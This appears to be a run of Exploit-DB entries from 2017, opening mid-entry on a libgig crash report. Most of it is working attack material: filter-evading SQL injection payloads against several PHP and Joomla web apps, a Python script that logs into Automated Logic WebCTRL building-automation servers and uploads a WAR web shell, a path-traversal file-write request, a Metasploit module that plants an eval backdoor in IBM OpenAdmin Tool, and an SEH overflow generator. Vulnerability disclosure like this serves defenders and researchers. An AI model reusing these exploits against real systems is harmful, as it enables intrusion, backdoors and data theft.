#8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:3849 gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)
==44028== ABORTING
POC:
libgig_4.0.0_invalid_memory_read.gig
CVE:
CVE-2017-12954
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42546.zip
# # # # #
# Exploit Title: Matrimonial Script - SQL Injection
# Dork: N/A
# Date: 22.08.2017
# Vendor Homepage: http://www.scubez.net/
# Software Link: http://www.mscript.in/
# Demo: http://www.mscript.in/matrimonial-demo.html
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/viewprofile.php?id=[SQL]
#
# -MUS00053'+/*!11100uNiOn*/(/*!11100sElEct*/0x283129,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729,0x28343829,0x28343929,0x28353029,0x28353129,0x28353229,0x28353329,0x28353429,0x28353529,0x28353629,0x28353729,0x28353829,0x28353929,0x28363029,0x28363129,0x28363229,0x28363329,0x28363429,0x28363529,0x28363629,0x28363729,0x28363829,0x28363929,0x28373029,0x28373129,0x28373229,0x28373329,0x28373429,0x28373529,0x28373629,0x28373729,0x28373829,0x28373929,0x28383029,0x28383129,0x28383229,0x28383329,0x28383429,0x28383529,0x28383629,0x28383729,0x28383829,0x28383929,0x28393029,0x28393129,0x28393229,0x28393329,0x28393429,0x28393529,0x28393629,0x28393729,0x28393829,0x28393929,0x2831303029,0x2831303129,0x2831303229,0x2831303329,0x2831303429,0x2831303529,0x2831303629,0x2831303729,0x2831303829,0x2831303929,0x2831313029,0x2831313129,0x2831313229,0x2831313329,0x2831313429,0x2831313529,0x2831313629,0x2831313729,0x2831313829,0x2831313929,0x2831323029,0x2831323129,0x2831323229,0x2831323329,0x2831323429,0x2831323529,0x2831323629,0x2831323729,0x2831323829,0x2831323929,0x2831333029,0x2831333129,0x2831333229,0x2831333329,0x2831333429,0x2831333529,0x2831333629,0x2831333729,0x2831333829,0x2831333929,0x2831343029,0x2831343129,0x2831343229,0x2831343329,0x2831343429,0x2831343529,0x2831343629,0x2831343729,0x2831343829,0x2831343929,0x2831353029,0x2831353129,0x2831353229,0x2831353329,0x2831353429,0x2831353529,0x2831353629,0x2831353729,0x2831353829,0x2831353929,0x2831363029,0x2831363129,0x2831363229,0x2831363329,0x2831363429,0x2831363529,0x2831363629,0x2831363729,0x2831363829,0x2831363929,0x2831373029,0x2831373129,0x2831373229,0x2831373329,0x2831373429,0x2831373529,0x2831373629,0x2831373729,0x2831373829,0x2831373929,0x2831383029,0x2831383129,/*!50000dataBase*/(),0x2831383329)--+-
#
# http://localhost/[PATH]/load_caste_state_city.php?list_type=caste&&parent_id=[SQL]
#
# -1+/*!22255union*/+/*!22255+sElEct*/+0x31,(/*!22255+sElEct*/+eXpoRt_Set(5,@:=0,(/*!22255+sElEct*/+count(*)fROm(iNformatiOn_sChemA.colUmns)/*!22255where*/@:=eXpoRt_Set(5,eXpoRt_Set(5,@,table_name,0x3c6c693e,2),cOlumN_naMe,0xa3a,2)),@,2)),0x33--+-
#
# http://localhost/[PATH]/printprofile.php?id=[SQL]
# http://localhost/[PATH]/viewphoto.php?id=[SQL]
# http://localhost/[PATH]/advsearch_results.php?gender=[SQL]
# http://localhost/[PATH]/advsearch_results.php?age1=[SQL]
# http://localhost/[PATH]/advsearch_results.php?age2=[SQL]
# http://localhost/[PATH]/advsearch_results.php?religion=[SQL]
# http://localhost/[PATH]/advsearch_results.php?caste=[SQL]
# http://localhost/[PATH]/advsearch_results.php?ms=[SQL]
# http://localhost/[PATH]/advsearch_results.php?language=[SQL]
# http://localhost/[PATH]/advsearch_results.php?edu=[SQL]
# http://localhost/[PATH]/advsearch_results.php?occu=[SQL]
# http://localhost/[PATH]/advsearch_results.php?country=[SQL]
#
# Etc..
# # # # #
Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write
Vendor: Automated Logic Corporation
Product web page: http://www.automatedlogic.com
Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior
ALC WebCTRL, i-Vu 6.0 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
Summary: WebCTRL®, Automated Logic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators to optimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need to keep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.
Desc: The vulnerability is triggered by an authenticated user that can use
the manualcommand console in the management panel of the affected application.
The ManualCommand() function in ManualCommand.js allows users to perform additional
diagnostics and settings overview by using pre-defined set of commands. This
can be exploited by using the echo command to write and/or overwrite arbitrary
files on the system including directory traversal throughout the system.
Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
Apache-Coyote/1.1
Apache Tomcat/7.0.42
CJServer/1.1
Java/1.7.0_25-b17
Java HotSpot Server VM 23.25-b01
Ant 1.7.0
Axis 1.4
Trove 2.0.2
Xalan Java 2.4.1
Xerces-J 2.6.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5430
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5430.php
CVE ID: CVE-2017-9640
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9640
30.01.2017
--
PoC:
GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1
Host: TARGET
---
GET http://TARGET/touch.txt HTTP/1.1
peend
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
#
# Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution
#
#
# Vendor: Automated Logic Corporation
# Product web page: http://www.automatedlogic.com
# Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
# ALC WebCTRL, SiteScan Web 6.1 and prior
# ALC WebCTRL, i-Vu 6.0 and prior
# ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
# ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
#
# Summary: WebCTRL®, Automated Logic's web-based building automation
# system, is known for its intuitive user interface and powerful integration
# capabilities. It allows building operators to optimize and manage
# all of their building systems - including HVAC, lighting, fire, elevators,
# and security - all within a single HVAC controls platform. It's everything
# they need to keep occupants comfortable, manage energy conservation measures,
# identify key operational problems, and validate the results.
#
# Desc: WebCTRL suffers from an authenticated arbitrary code execution
# vulnerability. The issue is caused due to the improper verification
# when uploading Add-on (.addons or .war) files using the uploadwarfile
# servlet. This can be exploited to execute arbitrary code by uploading
# a malicious web archive file that will run automatically and can be
# accessed from within the webroot directory. Additionaly, an improper
# authorization access control occurs when using the 'anonymous' user.
# By specification, the anonymous user should not have permissions or
# authorization to upload or install add-ons. In this case, when using
# the anonymous user, an attacker is still able to upload a malicious
# file via insecure direct object reference and execute arbitrary code.
# The anonymous user was removed from version 6.5 of WebCTRL.
#
# Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
# Apache-Coyote/1.1
# Apache Tomcat/7.0.42
# CJServer/1.1
# Java/1.7.0_25-b17
# Java HotSpot Server VM 23.25-b01
# Ant 1.7.0
# Axis 1.4
# Trove 2.0.2
# Xalan Java 2.4.1
# Xerces-J 2.6.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5431
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5431.php
#
# ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01
# CVE ID: CVE-2017-9650
# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9650
#
#
# 30.01.2017
#
#
import itertools
import mimetools
import mimetypes
import cookielib
import binascii
import urllib2
import urllib
import sys
import re
import os
from urllib2 import URLError
global bindata
__author__ = 'lqwrm'
piton = os.path.basename(sys.argv[0])
def bannerche():
print '''
@-------------------------------------------------@
| |
| WebCTRL 6.5 Authenticated RCE PoC |
| ID: ZSL-2017-5431 |
| Copyleft (c) 2017, Zero Science Lab |
| |
@-------------------------------------------------@
'''
if len(sys.argv) < 3:
print '[+] Usage: '+piton+' <IP> <WAR FILE>'
print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n'
sys.exit()
bannerche()
host = sys.argv[1]
filename = sys.argv[2]
with open(filename, 'rb') as f:
content = f.read()
hexo = binascii.hexlify(content)
bindata = binascii.unhexlify(hexo)
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
print '[+] Probing target http://'+host
try:
checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en')
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print '[!] Error 001:'
print '[-] Check your target!'
print
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print '[!] Error 002:'
print '[-] Check your target!'
print
sys.exit()
print '[+] Target seems OK.'
print '[+] Login please:'
print '''
Default username: Administrator, Anonymous
Default password: (blank), (blank)
'''
username = raw_input('[*] Enter username: ')
password = raw_input('[*] Enter password: ')
login_data = urllib.urlencode({'pass':password, 'name':username, 'touchscr':'false'})
opener.addheaders = [('User-agent', 'Thrizilla/33.9')]
login = opener.open('http://'+host+'/?language=en', login_data)
auth = login.read()
if re.search(r'productName = \'WebCTRL', auth):
print '[+] Authenticated!'
token = re.search('wbs=(.+?)&', auth).group(1)
print '[+] Got wbs token: '+token
cookie1, cookie2 = [str(c) for c in cj]
cookie = cookie1[8:51]
print '[+] Got cookie: '+cookie
else:
print '[-] Incorrect username or password.'
print
sys.exit()
print '[+] Sending payload.'
class MultiPartForm(object):
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
self.form_fields.append((name, value))
return
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return
def __str__(self):
parts = []
part_boundary = '--' + self.boundary
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
if __name__ == '__main__':
form = MultiPartForm()
form.add_field('wbs', token)
form.add_field('file"; filename="'+filename, bindata)
request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile')
request.add_header('User-agent', 'SCADA/8.0')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()
print '[+] Payload uploaded.'
print '[+] Shell available at: http://'+host+'/'+filename[:-4]
print
sys.exit()
Automated Logic WebCTRL 6.5 Insecure File Permissions Privilege Escalation
Vendor: Automated Logic Corporation
Product web page: http://www.automatedlogic.com
Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
ALC WebCTRL, SiteScan Web 6.1 and prior
ALC WebCTRL, i-Vu 6.0 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
Summary: WebCTRL®, Automated Logic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators to optimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need to keep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.
Desc: WebCTRL server/service suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the executable
file with a binary of choice. The vulnerability exist due to the improper permissions,
with the 'M' flag (Modify) or 'C' flag (Change) for 'Authenticated Users' group.
The application suffers from an unquoted search path issue as well impacting the service
'WebCTRL Service' for Windows deployed as part of WebCTRL server solution. This could
potentially allow an authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. A successful attempt would require the
local user to be able to insert their code in the system root path undetected by the
OS or other security applications where it could potentially be executed during
application startup or reboot. If successful, the local user’s code would execute
with the elevated privileges of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5429
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5429.php
CVE ID: CVE-2017-9644
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9644
30.01.2017
---
sc qc "WebCTRL Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Webctrl Service
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WebCTRL6.0\WebCTRL Service.exe -run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WebCTRL Service 6.0
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
cacls "C:\WebCTRL6.0\WebCTRL Service.exe"
C:\WebCTRL6.0\WebCTRL Service.exe
BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
cacls "C:\WebCTRL6.0\WebCTRL Server.exe"
C:\WebCTRL6.0\WebCTRL Server.exe
BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution',
'Description' => %q{
This module exploits an unauthenticated remote PHP code execution
vulnerability in IBM OpenAdmin Tool included with IBM Informix
versions 11.5, 11.7, and 12.1.
The 'welcomeServer' SOAP service does not properly validate user input
in the 'new_home_page' parameter of the 'saveHomePage' method allowing
arbitrary PHP code to be written to the config.php file. The config.php
file is executed in most pages within the application, and accessible
directly via the web root, resulting in code execution.
This module has been tested successfully on IBM OpenAdmin Tool 3.14
on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.
},
'License' => MSF_LICENSE,
'Author' =>
[
'SecuriTeam', # Discovery and exploit
'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
],
'References' =>
[
['CVE', '2017-1092'],
['EDB', '42091'],
['URL', 'https://www-01.ibm.com/support/docview.wss?uid=swg22002897'],
['URL', 'https://blogs.securiteam.com/index.php/archives/3210'],
['URL', 'http://seclists.org/fulldisclosure/2017/May/105']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Privileged' => false, # Privileged on Windows but not on *nix targets
'Targets' => [['Generic (PHP Payload)', {}]],
'DisclosureDate' => 'May 30 2017',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, 'The base path to IBM OpenAdmin Tool', '/openadmin' ])
]
)
end
def set_home_page(homepage)
xml = Document.new
xml.add_element 'soapenv:Envelope', 'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema',
'xmlns:soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/',
'xmlns:urn' => 'urn:Welcome'
xml.root.add_element 'soapenv:Header'
xml.root.add_element 'soapenv:Body'
body = xml.root.elements[2]
body.add_element 'urn:saveHomePage', 'soapenv:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
new_home_page = body.elements[1].add_element 'new_home_page', 'xsi:type' => 'xsd:string'
new_home_page.text = homepage
uri = normalize_uri target_uri.path, 'services', 'welcome', 'welcomeService.php'
send_request_cgi 'method' => 'POST',
'uri' => uri,
'ctype' => 'text/xml; charset=UTF-8',
'headers' => { 'SOAPAction' => 'urn:QBEAction' },
'data' => xml.to_s
end
def check
fingerprint = Rex::Text.rand_text_alpha(rand(10) + 6)
res = set_home_page "\";##{fingerprint}"
unless res
vprint_status "#{peer} Connection failed"
return CheckCode::Unknown
end
if res.code == 200 && res.body =~ %r{<ns1:saveHomePageResponse><return xsi:type="xsd:string">";##{fingerprint}</return>}
return CheckCode::Detected
end
Msf::Exploit::CheckCode::Safe
end
def exploit
cmd_param = Rex::Text.rand_text_alpha(rand(10) + 6)
res = set_home_page "\";eval($_POST['#{cmd_param}']); #"
unless res
vprint_status "#{peer} Connection failed"
return CheckCode::Unknown
end
if res.code == 200 && res.body =~ /<ns1:saveHomePageResponse><return xsi:type="xsd:string">";eval/
print_good "#{peer} Wrote backdoor to config.php file successfully"
else
fail_with Failure::UnexpectedReply, "#{peer} Failed to backdoor config.php"
end
vprint_status "#{peer} Executing payload..."
send_request_cgi({ 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'conf', 'config.php'),
'vars_post' => { cmd_param => payload.encoded } }, 5)
print_warning "#{peer} Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor"
end
end
# # # # #
# Exploit Title: Joomla! Component Appointment v1.1 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Software Link: https://extensions.joomla.org/extensions/extension/appointment/
# Demo: http://joomlaextension.biz/appointment/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows the working user group to inject sql commands ...
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php/service-list?view=allorder&ser_id=[SQL]
# -84+/*!11111union*/+/*!11111select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+-
#
# http://localhost/[PATH]/index.php/service-list?view=allorder&emp_id=[SQL]
#
# <input type="hidden" name="sername" id="sername" value="............
#
# Etc...
# # # # #
# # # # #
# Exploit Title: Matrimony Script 2.7 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://www.matrimony-script.com/
# Software Link: http://www.matrimony-script.com/php-matrimony-software.html
# Demo: http://www.matrimonysearch.com/
# Version: 2.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/wedding.php?category=[SQL]&city=[SQL]
#
# http://localhost/[PATH]/homeads.php?id=[SQL]
#
# Etc...
# # # # #
#!/usr/bin/python
# Exploit Title : MessengerScan v1.05 Hostname/IP Field SEH/EIP Overwrite POC
# Discovery by : Anurag Srivastava
# Email : anurag.srivastava@pyramidcyber.com
# Discovery Date : 18/08/2017
# Software Link : https://www.mcafee.com/in/downloads/free-tools/messengerscan.aspx#
# Tested Version : 1.05
# Vulnerability Type: SEH Overwrite POC
# Tested on OS : Windows 7 Ultimate x64bit
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
#SEH chain of main thread
#Address SE handler
#42424242 *** CORRUPT ENTRY ***
# Offset to the SEH is 772
buffer = "A"*772
# Address to the Handler Code
seh = "B"*4
#Junk
junk = "C"*12
# Address to the EIP
eip = "D"*4
f = open("evil.txt", "wb")
f.write(buffer+seh+junk+eip)
f.close()
# # # # #
# Exploit Title: Joomla! Component KissGallery 1.0.0 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage: http://terrywcarter.com/
# Software Link: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/kissgallery/
# Demo: http://demo.terrywcarter.com/kissgallery
# Version: 1.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/kissgallery/1[SQL]
#
# Etc..
# # # # #
# # # # #
# Exploit Title: LiveProjects 1.0 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://livecrm.co/
# Software Link: https://codecanyon.net/item/liveprojects-complete-project-management-crm/10436800
# Demo: http://liveprojects.livecrm.co/livecrm/web/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows the users to inject sql commands ...
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?r=pmt/project/project-view&id=[SQL]
#
# http://localhost/[PATH]/index.php?r=pmt/task/task-view&id=[SQL]
#
# http://localhost/[PATH]/index.php?r=pmt/project/project-view&id=[SQL]
#
# Etc...
# # # # #